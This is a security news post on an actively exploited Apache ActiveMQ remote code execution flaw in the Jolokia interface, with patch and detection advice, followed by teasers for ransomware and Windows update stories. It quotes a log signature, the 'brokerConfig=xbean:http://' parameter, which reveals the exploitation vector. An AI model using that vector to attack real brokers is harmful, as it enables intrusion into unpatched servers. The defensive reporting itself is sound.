13-Year-Old Apache ActiveMQ RCE Now Under Active Exploitation — Patch Now

MS

17 Apr 2026 — 2 min read

A 13-year-old remote code execution vulnerability in Apache ActiveMQ has been added to CISA's Known Exploited Vulnerabilities (KEV) Catalog after threat actors were confirmed actively exploiting it in the wild. The flaw, tracked as CVE-2026-34197, was patched in March 2026 — but remained undetected in production environments for over a decade.

What Happened

Horizon3 AI researcher Naveen Sunkavally discovered the vulnerability with help from a Claude AI assistant. The root cause: improper input validation in the Jolokia JMX interface, allowing authenticated attackers to inject arbitrary commands. Apache released patches for ActiveMQ Classic versions 6.2.3 and 5.19.4 on March 30. ShadowServer is currently tracking more than 7,500 exposed ActiveMQ servers online. On April 16, CISA ordered FCEB agencies to patch by April 30 under BOD 22-01 and confirmed active exploitation.

Why It Matters

ActiveMQ is one of the most widely deployed open-source message brokers in the world — it underpins asynchronous communication in everything from financial services to logistics to cloud infrastructure. A 13-year runway means this flaw could have been present in some of the most sensitive enterprise environments imaginable. The ShadowServer count of 7,500+ exposed instances is likely a floor, not a ceiling, given internal-facing deployments.

What Defenders Do

Treat this as P0 patching. Horizon3 provides a clear detection hook: search broker logs for connections using the brokerConfig=xbean:http:// query parameter combined with the VM transport protocol — that is the exploitation signature. If you cannot patch immediately, consider network-isolating ActiveMQ management interfaces (the Jolokia JMX endpoint is the attack surface) and disabling untrusted broker connections. Horizon3's full advisory includes indicators of compromise and network-based detection logic.

What It Signals

Two trends converge here. First: AI-assisted vulnerability research is producing discoveries that would have taken far longer manually — including deep historical bugs hiding in widely-used software. Second: the window between patch release and active exploitation continues to compress. CISA's KEV addition validates that threat actors moved on this within days of disclosure, not weeks. Organizations running any version of ActiveMQ Classic should assume they are in-scope for targeting and act accordingly.

References

CVE-2026-34197 — NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-34197

CISA KEV Catalog: https://www.cisa.gov/known-exploited-vulnerabilities-catalog

Horizon3 Advisory: https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/

Apache Security Advisory: https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt

Microsoft Confirms LSASS Crashes Are Putting Some Domain Controllers into Reboot Loops

What Happened Microsoft confirmed this week that the April 2026 Windows security update (KB5082063) is causing Local Security Authority Subsystem Service (LSASS) crashes on non-Global Catalog domain controllers running Privileged Access Management (PAM). Affected servers enter restart loops during early startup, before authentication and directory services can come online. The

Payouts King Ransomware Uses QEMU VMs to Bypass Endpoint Security

What Happened Sophos researchers documented a threat actor deploying QEMU virtual machines on compromised Windows hosts as part of the Payouts King ransomware operation. The attack chain uses QEMU to run a hidden Alpine Linux VM that executes attacker tooling — completely invisible to host-based endpoint security. The campaigns, tracked as

Payouts King Ransomware Abuses QEMU VMs to Evade Endpoint Security — What Practitioners Need to Know

Payouts King ransomware operators are abusing QEMU virtual machines as a covert staging environment on compromised Windows hosts — effectively using the emulator to run a hidden Linux attack platform that sits beneath endpoint security tools. Security researchers at Sophos documented the technique in two active campaigns this week, and the

The Quiet Revolution — What Security-Focused LLMs Actually Change for Practitioners

There is a quiet revolution happening in security operations, and most practitioners have not yet decided how to feel about it. AI language models — particularly those explicitly designed for security reasoning, threat analysis, and defensive operations — are entering the workflows of the people who keep systems running and breaches contained.